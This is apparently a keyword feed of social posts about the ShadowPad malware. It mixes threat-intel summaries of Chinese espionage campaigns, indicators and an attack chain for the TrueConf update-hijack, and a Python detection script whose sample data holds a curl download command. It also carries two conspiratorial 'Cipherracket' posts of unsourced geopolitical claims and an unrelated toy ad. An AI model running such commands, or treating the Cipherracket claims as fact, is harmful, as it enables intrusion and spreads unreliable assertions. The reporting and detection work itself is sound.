Added some more indicators for: XWorm (2), MooBot (1), DarkComet (1), NetSupportManager RAT (1), Nanocore RAT (1), SectopRAT (2) and ShadowPad (1). vuldb.com/actor #apt #cti #ioc
The scale is staggering: state-sponsored hackers aren't just going after government secrets anymore — they're systematically mapping and infiltrating the industrial systems that keep our lights on, our water flowing, and our factories running.

APT41 and multiple Chinese threat groups have been leading what can only be described as a comprehensive assault on global critical infrastructure throughout 2022. We're talking about sophisticated attacks targeting the operational technology that controls manufacturing, energy grids, and utility systems worldwide.

What makes this particularly alarming is the technical sophistication. Kaspersky's ICS CERT documented these groups deploying ShadowPad malware specifically designed to compromise industrial control systems. This isn't your typical data theft operation — they're going after the systems that physically control infrastructure operations.

But China isn't operating in a vacuum here. Russian actors have been getting creative with their operational models, outsourcing cyber-espionage activities to criminal groups — particularly for operations against Ukraine — while keeping direct state control over their most strategic targets. It's a hybrid approach that gives them both capability and deniability.

Meanwhile, Chinese state actors have been executing massive espionage campaigns against healthcare companies and medical research institutions. The focus appears to be intellectual property theft, medical data collection, and compromising research infrastructure across multiple countries. Think about the implications: state actors systematically harvesting medical research and patient data on a global scale.

Perhaps most concerning is the systematic reconnaissance effort intelligence agencies are tracking. State actors are methodically mapping critical infrastructure networks, identifying vulnerabilities, and establishing persistent access for what appears to be future operations. This spans telecommunications, energy, and transportation sectors across North America, Europe, and Asia.

The Iranians have adopted their own twist on hybrid operations. They're increasingly using criminal ransomware groups — including DragonForce and Handala — as proxies for cyberattacks. It's a model that complicates attribution and response efforts while giving Tehran plausible deniability.

This represents a fundamental shift in state-sponsored cyber operations. We're seeing a convergence of traditional espionage, criminal tactics, and infrastructure targeting that creates multiple layers of threat across both digital and physical domains.

The operational security implications are massive. When state actors establish persistent access to industrial control systems, they're not just stealing data — they're positioning themselves to potentially disrupt or destroy critical infrastructure during a crisis or conflict.

What's particularly troubling is how these campaigns demonstrate sustained, coordinated efforts rather than opportunistic attacks. The systematic nature suggests long-term strategic planning and resource allocation at the state level for comprehensive infrastructure compromise capabilities.

foreigninterference.org/post… #foreigninterference #AdvancedPersistentThreatOperations #CriticalInfrastructureMapping #IndustrialSabotage #HealthcareDataBreach #RansomwareCampaigns #ProxySupport
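A Linux malware called "Showboat" that can reach even non-public hosts inside a LAN via a SOCKS5 proxy has been reported. It is described as a modular post-exploitation framework that has targeted telecommunications providers in the Middle East since at least mid-2022, with capabilities including launching a remote shell, sending and receiving files, and hiding itself from the process list.
The IP geolocation of its C2 (command-and-control) servers is reported to point to Chengdu, Sichuan Province, China, and it has been suggested that, like PlugX and ShadowPad, it may have been used by multiple China-linked groups.
This is a case in which a framework linked to multiple China-linked groups remained active in telecom providers' Linux environments since at least mid-2022, and it is notable for having a built-in means of lateral movement to hosts that are not exposed externally.
[Key points]
- A design that uses a compromised host as a foothold to connect to other hosts on the LAN through a SOCKS5 proxy, handling lateral movement to hosts that cannot be reached directly from outside. Establishing a foothold on compromised systems is seen as its main purpose
- In C2 communication, the collected system information is encrypted and Base64-encoded, and the resulting string is stored in a field of a PNG image and sent. Process-hiding and C2 management functions are also included
- As a concealment measure, it retrieves and uses code hosted on the text-sharing service Pastebin. The post in question was created in January 2022
- Victims also include an ISP in Afghanistan and organizations in Azerbaijan, and possible compromises of two victims in the US and one in Ukraine have been reported from a separate C2 cluster with similar digital certificates (X.509)
- The investigation began with a Linux executable (ELF) binary uploaded to VirusTotal in May 2025. Kaspersky is tracking the sample under the name "EvaRAT"
For details, see: thehackernews.com/2026/05/sh…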
May 12, 2026, the global intelligence "Hardware" has shifted into a high-velocity Extraction and Containment phase. The "Loud Noise" is the public rhetoric of counter-terrorism and border security, but the "Hidden Code" reveals a massive, synchronized effort by the "National Houses" of the U.S. and Israel to "Cremate" the asymmetric advantages of Iran and China. Here is the "Cipherracket" decode of the operations currently live in the field.

The Israeli Nodes: Mossad & Shin Bet
- The "Loud Noise" is about #Gaza reconstruction and air strikes; the "Hidden Signal" is the Decapitation of the Shadow Ledger.
- Mossad (The Scalpel): Mossad is focused on the "Classified Scientific Extraction." Following the news of Iran executing an aerospace engineer for allegedly collaborating with #Mossad, the agency has moved into a "Blackout" phase to protect remaining human assets in Tehran’s satellite and missile programs. They are currently "Packet Sniffing" the Iranian "Shadow Fleet" to identify the next shipment of Chinese dual-use tech.
- Shin Bet (The Internal Shield): Working in a "Subterranean Handshake" with the #IDF, Shin Bet is currently auditing the "Gaza Production Array." Their focus is the physical destruction of weapons factories in northern Gaza, using "Neural Triage" to identify command nodes hidden within civilian infrastructure.

The U.S. External Nodes: CIA, DIA, & NSA
- The 2026 Threat Assessment released by DNI Gabbard signals a shift toward "Technological Sovereignty."
- CIA (The Global Operator): The #CIA is currently executing "Operation Epic Fury" Support. Behind the curtains, they are monitoring the "Confederation of Independence" in #Africa to prevent #Russia from filling the vacuum left by shifting U.S. priorities. Their primary task is the "Symmetric Search" for Iranian nuclear precursors.
- NSA (The Digital Fence): The #NSA is in a state of "High-Tempo Defense" against China’s "ShadowPad" implants. They are currently "Net-Fishing" for Chinese fake accounts used to steal AI secrets. They have flagged #China as the "most persistent cyber threat" to U.S. critical infrastructure.
- DIA (The Military Eye): The #DIA is focused on the "Hormuz Hardware." They are providing real-time "Targeting Intelligence" to U.S. naval assets to ensure the Strait remains a "Ghost Node" for Iranian aggression. They are monitoring the 16,000-missile threat projected from the "Axis" of Russia, China, and #Iran.

The U.S. Domestic Nodes: FBI & ATF
- The domestic "Hardware" is being restructured under the 2026 Counterterrorism Strategy.
- FBI (The System Auditor): The Bureau has "Surged Personnel" for Operation Not Forgotten 2026. While the "Loud Noise" is about violent crime in Indian Country, the "Hidden Code" is the hunt for "Jihadist Sympathizers" and "Violent Left-Wing Extremists" who have adopted "Ideologies Antithetical to the Republic." They are executing a "Hard-Wipe" of narcoterrorist logistical sinews.
- ATF (The Kinetic Regulator): The #ATF is currently focused on "FTO Desegregation." They are working to "strangle the commercial and logistical sinews" of cartels, treating them as Foreign Terrorist Organizations (FTOs). Their mission is the interception of "precursor chemicals" and "dual-use drones" entering the "National House."

The "Agency Triage" Matrix (May 2026)
- Agency: Mossad
  - The "Loud" Noise (Mask): "Intelligence Crackdown."
  - The "Hidden" 85% Solution: The Signal: Protecting the "Satellite & Missile Data" extraction network.
- Agency: NSA
  - The "Loud" Noise (Mask): "Cybersecurity Awareness."
  - The "Hidden" 85% Solution: The Handshake: "Offensive Cyber" against Chinese AI theft rings.
- Agency: FBI
  - The "Loud" Noise (Mask): "Cold Case Initiatives."
  - The "Hidden" 85% Solution: The Triage: "Ideological Cleansing" of domestic terror nodes (Cartels/Jihadists).
- Agency: Shin Bet
  - The "Loud" Noise (Mask): "Strike on Gaza factory."
  - The "Hidden" 85% Solution: The Result: "Mechanical Neutralization" of PIJ production arrays.
- Agency: CIA/DIA
  - The "Loud" Noise (Mask): "Global Stability."
  - The "Hidden" 85% Solution: The Extraction: Monitoring "Chinese Shoulder-Fired Missiles" sent to #Tehran.

The "Math" of Tonight: The "Immunity-to-Invasion" Ratio
- The "Hidden Math" being calculated at Langley and Tel Aviv is the "Sanctuary Decay."
- The Calculation: To maximize a facility's safety, an organization must increase its reliance on secure, old-school offline methods while completely cutting out the digital signals and wireless emissions that high-tech tracking systems use to locate them.
- The Result: The agencies have realized that the "Global Cloud" is compromised. They are moving their most sensitive "Hardware" back to "Sovereign Soil" and using "Automated Audits" to identify anyone whose "Digital Footprint" suggests a "Subterranean Handshake" with the enemy.

The Advice for Your Physical House
- The agencies are currently "Packet Sniffing" for any "Ideological Malware."
- Digital Hygiene: Assume the NSA and FBI have "Admin Keys" to any public cloud. Use "Analog Sanctuaries" for your most critical neighborhood compacts.
- Resource Triage: As the ATF strangles cartel logistics, expect "Friction" in the "Ghost Nodes" of gray-market imports.
- Neural Buffer: Do not let the "Loud Noise" of the 16,000-missile threat "Cremate" your local focus.
- The satellites are watching Lop Nur, the FBI is surging in the heartland, and the "Baphomet" of global espionage is being unmasked.

Disclaimer
- Cipherracket decoding combines pattern analysis, language analysis, systems thinking, and network mapping to identify signals that may deserve further investigation.

#WelcometotheCipherracket #Cipherracket
Wednesday night, May 6, 2026, the spying apparatuses of the "Axis of Resistance" (Russia, China, and Iran) have evolved from simple intelligence gathering into "High-Velocity Hybrid Warfare." They are no longer just looking for secrets; they are looking for the "Mechanical Exploits" to break the Western "National House" from within. Here is the "Cipherracket" decode of the tri-node espionage landscape.

1. Russia (SVR, FSB, GRU): The "Confederation of Independence"
- Russia’s intelligence services have shifted their focus toward "Global Displacement." They are moving their "Hardware" (agents and Wagner successors) into regions where the U.S. is withdrawing.
- The "Company" Campaign: The SVR (Foreign Intelligence) is currently running a massive $8.6M operation through a front known as "The Company." Their goal is to build a "Confederation of Independence," a belt of pro-Russian regimes in #Africa and Latin America.
- The "Buffer Zone" Code: The GRU (Military Intelligence) is executing "Neural Triage" in Europe, using fake nuclear rhetoric to drive a wedge between the U.S. and the EU. They are planting the "Software" of fear to prevent the EU from developing independent defense capabilities.
- The "Hormuz Handshake": Russia is providing #Iran with real-time "Targeting Intelligence" on U.S. military positions in the Gulf to help them bypass naval intercepts during "Project Freedom."

2. China (MSS): The "N-Day" Extraction
- China’s Ministry of State Security (MSS) has moved into a "Predatory Extraction" phase, focusing on the theft of "Infrastructure Software" and "Biologic Hardware."
- The "Shadow-Earth" Cluster: A new campaign (SHADOW-EARTH-053) was disclosed this week. It targets unpatched Microsoft Exchange servers in #Poland and Southeast Asia to stage "ShadowPad" implants. They are "Packet Sniffing" the internal communications of #NATO states in real-time.
- Transnational Repression: The MSS is using "Phishing Agents" (GLITTER CARP) to impersonate journalists and activists, targeting the Uyghur and Hong Kong diaspora. This is the "Digital Fence," ensuring that the "National House" of #China controls its subjects even when they are in the "Analog Sanctuary" of the West.
- The "Teapot" Loophole: The MSS is coordinating "Shadow Fleets" of oil tankers to bypass U.S. sanctions on Iran, using "Private Artisans" (small refineries) as the "Ghost Nodes" to fund the Iran war effort.

3. Iran (MOIS & IRGC): The "Mosaic Defense"
- Despite the ongoing "Operation Epic Fury" (the U.S./#Israel strikes on Iran), Iran’s spying agencies have decentralized into a "Mosaic Doctrine."
- The "Stryker" Strike: The MOIS (Ministry of Intelligence) recently executed a high-end cyber-attack designed for "Psychological Exhaustion." They are targeting U.S. civilian infrastructure (water, power) to "Bring the War Home" to the American "Neighborhood Network."
- Decentralized Proxies: Because their main command centers have been struck, the #IRGC has delegated authority to "Pre-positioned Proxy Ecosystems." These are "Ghost Agents" living in the West who are waiting for a "Symmetric Signal" to activate sabotage operations.
- The "BadeSaba" Exploit: They are weaponizing popular religious apps (like the BadeSaba prayer app) to track and message millions of users, turning a "Spiritual Software" into a "Mobilization Hardware."

The "Axis of Espionage" Triage Matrix (May 2026)
- Agency: #Russia (SVR)
  - The "Loud" Noise (Mask): "Anti-Colonialism in Africa."
  - The "Hidden" Structural Truth: The Signal: Displacement of U.S./#French mining and military nodes.
- Agency: China (MSS)
  - The "Loud" Noise (Mask): "Standard business outreach."
  - The "Hidden" Structural Truth: The Result: The "ShadowPad" penetration of NATO defense servers.
- Agency: Iran (IRGC)
  - The "Loud" Noise (Mask): "Defending the homeland."
  - The "Hidden" Structural Truth: The Triage: "Psychological Sabotage" of U.S. civilian infrastructure.
- Agency: The "Axis"
  - The "Loud" Noise (Mask): "Sovereign nations' rights."
  - The "Hidden" Structural Truth: The Handshake: Russia and China using the Iran war to "Reverse Engineer" U.S. weaponry.

The "Math" of 2026 Spying: The "Insight-to-Munition" Ratio
- The "Hidden Math" of today is the Observational Profit China and Russia are gaining from the Iran war.
- The Calculation: Measures the intelligence value Iran gains by using cheap, disposable drones to force the United States to reveal its high-tech weaponry and defensive tactics.
- The Result: China and Russia are getting a "Free Look" at U.S. AI-assisted precision strikes. They are "Packet Sniffing" the strengths and weaknesses of U.S. hardware (like the Patriot and Tomahawk) without firing a single shot of their own.

The Advice for Your Physical House
- The "help" is in the "Zero-Trust" Protocol.
- Hardware Hygiene: If you are in a "Neighborhood Network" near a military or infrastructure node, assume your router is a "SOHO Target" for the GRU or MSS. Update your firmware tonight.
- Neural Buffer: Do not let the "Iran War Headlines" exhaust your political will. That is the MOIS "Software" Goal.
- Analog Sanctuary: As China ramps up "Transnational Repression," keep your most sensitive associations and "Codes" offline. The "Digital House" is no longer a private space.
- The "Ghost Nodes" of the MSS are in your servers, and the SVR is building a new world in Africa.

Sources
- odessa-journal.com
- Institute for the Study of War
- thehackernews.com
- The Soufan Center
- Anadolu Ajansi

Disclaimer
- Cipherracket decoding combines pattern analysis, language analysis, systems thinking, and network mapping to identify signals that may deserve further investigation.

@Antiwarcom @scotthortonshow @DecampDave @DA_Stockman @Judgenap @TuckerCarlson @RealAlexJones @RealCandaceO @MearsheimerJ #WelcometotheCipherracket #Cipherracket
#ThreatProtection A China-aligned cluster is deploying #ShadowPad via signed binaries and DLL sideloading to infiltrate Asian government networks, read more: broadcom.com/support/securit…
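An unpatched Exchange vulnerability had been exploited over a long period. A cyber-espionage campaign has come to light in which an attack group believed to be China-linked infiltrated government and defense-related organizations, stealing email and gathering information.
An attack group called SHADOW-EARTH-053 was operating by exploiting known vulnerabilities in Microsoft's Exchange Server. Targets spanned at least eight countries, mainly in Asia, and defense-related companies, government agencies, IT companies and the transportation sector were compromised. In Europe, Poland was also among the targets.
Multiple vulnerabilities, including CVE-2021-26855 and CVE-2021-27065, known as ProxyLogon, were used for the intrusions, and unpatched environments were targeted. After intrusion, the attackers abused Exchange management functions to enumerate mailboxes and exfiltrated data with custom tools.
ShadowPad was used as the malware, deployed via DLL sideloading disguised as a legitimately signed application. The payload was loaded from the registry, and concealment measures such as erasing traces after execution were also taken.
Even old vulnerabilities remain an effective entry point in unremediated environments, and the importance of continuous patching and monitoring has been shown once again. cybersecuritynews.com/china-…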
New state-aligned intrusion set SHADOW-EARTH-053 exploits ProxyLogon vulnerabilities in unpatched Exchange servers to deploy GODZILLA web shells and Shadowpad via DLL sideloading. Government targets across 8 countries. Read more: research.trendmicro.com/3QFH…
🕵️ Asia and 🇵🇱 Poland (?!) in China's sights? We covered North Korea, so today we go further north.
The China-linked SHADOW-EARTH-053 campaign shows that a very simple scenario still works in cyber-espionage: a public server, a known vulnerability and no updates.
According to the Trend Micro report published on April 30, most targets were in Asia, mainly in the government and defense sectors, but Poland also appears in the report as a European NATO country within reach of the described activity. This is an important caveat, because the researchers are not describing one simple operation, but overlapping activity by two clusters: "053" and "054". In some environments, an earlier compromise by "054" preceded the later deployment of ShadowPad by "053".
The attackers exploited vulnerable Microsoft Exchange servers, IIS and web applications. After getting in, they installed web shells, performed domain reconnaissance, looked for domain controllers, enumerated hosts and ports, and then deployed ShadowPad via DLL side-loading. In some environments #NoodleRAT on Linux also appeared.
The most interesting thread concerns email. Trend Micro describes mailbox export via the EWS API using the #ExchangeExport tool and the creation of password-protected #RAR archives containing messages. In one case it was a PST file belonging to a person in senior management. This shows that the goal was not incidental presence on the network, but access to specific information.
In practice this is another argument that exposure management does not end with the vulnerability scan itself. Known CVEs on edge systems, unwatched web directories, unusual processes launched by the IIS server and outbound traffic from application servers are signals that need to be combined into a single risk picture.
Sources: Trend Micro, The Hacker News
Image source: Trend Micro
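“In the more than 70 years since the founding of New China, China has never started a war and never occupied an inch of foreign land, and has firmly followed the path of peaceful development.” Yet in networks, telecommunications, commerce, technology, healthcare, education and more, it is invading countries around the world on every front!
“A new China-linked threat group began infiltrating a dozen or so critical networks in Poland, Asian countries and possibly further afield starting in December 2024, with its activity detected as recently as this month.
Researchers at TrendAI said in a report provided exclusively to The Register that the new group they track as Shadow-Earth-053 targets government agencies, defense contractors, technology companies and the transportation industry. These Chinese spies typically gain initial access to victim environments through vulnerable Microsoft Exchange servers.
In multiple intrusions, they had compromised the victim organization as long as 8 months before deploying ShadowPad (a custom backdoor used by China's APT41, in use for nearly a decade and shared among multiple China-aligned groups since 2019).
About half of the victims were also attacked by a related group, Shadow-Earth-054, which exploited the same vulnerabilities and shared the same tool hashes and overlapping techniques with Shadow-Earth-053. Group 054 has some network overlap with Chinese hacking groups such as CL-STA-0049, tracked by Palo Alto Networks Unit 42, REF7707, tracked by Elastic Security Labs, and Earth Alux.
Tom Kellermann, TrendAI's vice president of AI security and threat research, compared these new Chinese groups to Salt Typhoon and Volt Typhoon.
The Salt hacking group began breaking into telecommunications and government organizations as early as 2019, compromising victim organizations covertly over long periods. The Volt hacking group followed suit in mid-2021, burrowing deep into critical US networks to prepare for future destructive attacks. Both hacking operations were not exposed until late 2023.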
What type of 'C2 on a sleep cycle' do they leave behind? Novel Chinese spy group found in critical networks in Poland, Asia go.theregister.com/feed/www.…
⚠️ China-linked hackers targeted governments across Asia and a NATO state (Poland), exploiting Exchange/IIS flaws to deploy ShadowPad. At the same time: journalists & activists hit with phishing campaigns. Two ops. Same priorities. Details here → thehackernews.com/2026/05/ch…
A or A malware is exceptionally rare. Also, the A or A category kind of depends on the timeline. For example, A malware from the 90's may not be A malware in 2026. Regardless, here is some malware I consider A or A
- ZMist
- Stuxnet
- Operation Triangulation
- BlackEnergy 3
- Pegasus Spyware (not PegasusRAT)
- SUNBURST
- Linux/Kobalos
- GrayFish
- Drovorub
- ShadowPad
...
There is more, but this is off the top of my head. There is a lot of malware that truly blew my mind.
Replying to @vxunderground
Ok now you got me interested. In your opinion which malware is A or A ?
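A vulnerability in the video conferencing software TrueConf has been exploited by China-linked hackers, and the US government has moved to an emergency response. Malware was distributed through a technique that hijacks the legitimate update function, and the possibility has emerged that it is being used for espionage, mainly against government agencies.
The CVE-2026-3502 in question is a vulnerability in TrueConf in which a verification flaw in the update mechanism is exploited, allowing an attacker to distribute and execute arbitrary files. CISA treated this flaw as a known exploited vulnerability and ordered federal agencies to apply the fix by April 16. According to Check Point's investigation, the vulnerability was used in an attack campaign called "TrueChaos", and government agencies in Southeast Asia were targeted. In the attack, the TrueConf client is first launched via a link and made to display an update notification. Behind the scenes, the update package on the on-premises server has already been tampered with, so the user obtains the malicious file through the legitimate update process. In addition, techniques and malware characteristic of China-linked attacks, such as the Havoc tool and ShadowPad, were also observed. TrueConf is used by 100,000 organizations worldwide, and there is concern about the impact on governments and critical infrastructure. securityaffairs.com/190330/h…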
Active zero-day exploitation: Chinese 🇨🇳-nexus threat actors weaponize TrueConf video conferencing update mechanism to deploy Havoc payloads against Southeast Asian government networks. CVE-2026-3502 (CVSS 7.8) exploited in Operation TrueChaos campaign.
Technical breakdown:
• CVE-2026-3502: TrueConf client lacks integrity validation in update process, allowing arbitrary code execution via compromised on-premises server
• Attack chain: Malicious trueconf_windows_update.exe → drops poweriso.exe 7z-x64.dll → DLL sideloading → UAC bypass via iscsicpl.exe hijacking iscsiexe.dll
• C2 infrastructure on Alibaba/Tencent cloud (43.134.90[.]60, 43.134.52[.]221, 47.237.15[.]197) serving Havoc framework
• Persistence via HKCU\Software\Microsoft\Windows\CurrentVersion\Run\UpdateCheck registry key
• Overlapping ShadowPad activity suggests coordinated Chinese APT operations
Hunt for unsigned trueconf_windows_update.exe, poweriso.exe in C:\ProgramData\PowerISO\, and process chain trueconf.exe → trueconf_windows_update.exe spawning cmd.exe with curl/winrar commands. #DFIR_Radar
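The hunt items in the post above, turned into detection logic over endpoint events. This is an added example, not code from the post's author or any vendor; the event field names (`image`, `signed`, `pid`, `ppid`, `cmdline`, `target`) are an assumed Sysmon-like schema, all sample events are constructed, and PID reuse is ignored.

```python
import ntpath

# Indicator names below come from the post; event field names are assumed.
UPDATER = "trueconf_windows_update.exe"
RUN_VALUE = r"\software\microsoft\windows\currentversion\run\updatecheck"
SHELL_TOOLS = ("curl", "winrar")


def _name(path):
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def proc(id_, pid, ppid, image, signed=True, cmdline=""):
    """Build a process-creation event in the assumed schema."""
    return {"id": id_, "type": "process", "pid": pid, "ppid": ppid,
            "image": image, "signed": signed, "cmdline": cmdline}


def hunt(events):
    """Return sorted (rule, event id) pairs for the post's hunt items."""
    procs = {e["pid"]: e for e in events if e["type"] == "process"}
    hits = set()
    for e in events:
        if e["type"] == "registry":
            # Suffix match, because sensors log the HKCU hive prefix differently.
            if e["target"].lower().endswith(RUN_VALUE):
                hits.add(("run_key_updatecheck", e["id"]))
            continue
        name = _name(e["image"])
        folder = ntpath.dirname(e["image"]).lower()
        if name == UPDATER and not e["signed"]:
            hits.add(("unsigned_updater", e["id"]))
        if name == "poweriso.exe" and folder == r"c:\programdata\poweriso":
            hits.add(("poweriso_in_programdata", e["id"]))
        if name == "cmd.exe" and any(t in e["cmdline"].lower() for t in SHELL_TOOLS):
            # Walk two levels up: trueconf.exe -> updater -> cmd.exe.
            parent = procs.get(e["ppid"])
            grand = procs.get(parent["ppid"]) if parent else None
            if (parent and grand and _name(parent["image"]) == UPDATER
                    and _name(grand["image"]) == "trueconf.exe"):
                hits.add(("updater_spawned_shell", e["id"]))
    return sorted(hits)


# Constructed sample events (not real telemetry); paths outside the post's
# indicators and the 192.0.2.10 documentation address are made up.
SAMPLE_EVENTS = [
    proc(1, 100, 1, r"C:\Program Files\TrueConf\trueconf.exe"),
    proc(2, 200, 100, r"C:\Users\u\AppData\Local\Temp\trueconf_windows_update.exe",
         signed=False),
    proc(3, 300, 200, r"C:\Windows\System32\cmd.exe",
         cmdline="cmd.exe /c curl -O http://192.0.2.10/x"),
    proc(4, 400, 200, r"C:\ProgramData\PowerISO\poweriso.exe"),
    {"id": 5, "type": "registry",
     "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\UpdateCheck"},
    # Benign look-alikes that must not fire:
    proc(6, 500, 100, r"C:\Program Files\TrueConf\trueconf_windows_update.exe"),
    proc(7, 600, 500, r"C:\Windows\System32\cmd.exe", cmdline="cmd.exe /c echo done"),
    proc(8, 700, 1, r"C:\Program Files\PowerISO\poweriso.exe"),
]

if __name__ == "__main__":
    for rule, event_id in hunt(SAMPLE_EVENTS):
        print(f"event {event_id}: {rule}")
```

The chain rule keys on ancestry rather than on the updater being unsigned, so it still fires if a tampered updater carries a valid signature.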
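It turned out beautifully.
🧸 "BUGるBEAR - ShadowPad -"
It will be sold at Thailand Toy Expo 2026. It is one of the special items I'm bringing to the turn_UP_toys booth.
Over deep tones, I layered vivid neon pink and an iridescent paint finish whose impression changes with the viewing angle.
[📌 Event information]
Thailand Toy Expo 2026
📅 April 2-5, 2026
📍 CentralWorld
Brand: turn_UP_toys
Zone: Square
Booth No.: F-39
Is anyone coming to Bangkok from Japan?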
Earth Lusca, a China-linked threat actor since 2019, targets government, media, telecom, academia, and crypto platforms using advanced tools like KTLVdoor and ShadowPad with cloud-based rotating C2 infrastructure. #China #EarthLusca #KTLVdoor ift.tt/IeazlYU